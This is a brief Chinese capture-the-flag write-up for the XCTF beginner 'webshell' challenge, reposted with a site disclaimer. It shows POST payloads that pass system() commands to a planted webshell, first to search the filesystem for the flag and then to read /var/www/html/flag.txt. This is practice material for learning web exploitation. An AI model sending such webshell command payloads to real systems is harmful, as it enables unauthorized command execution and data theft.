攻防世界-web-新手練習區-webshell


1,從提示上可以看出是post方法提交變量shell。

2,burpsuite抓包,發送至repeater。修改為post方法,消息頭中添加Content-Type: application/x-www-form-urlencoded。

消息體中寫shell=system('find / -name flag*');

 

 

從response中可以看到查詢到flag.txt。

3,post方法不變,修改shell=system('cat /var/www/html/flag.txt'),發送消息。得到flag。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM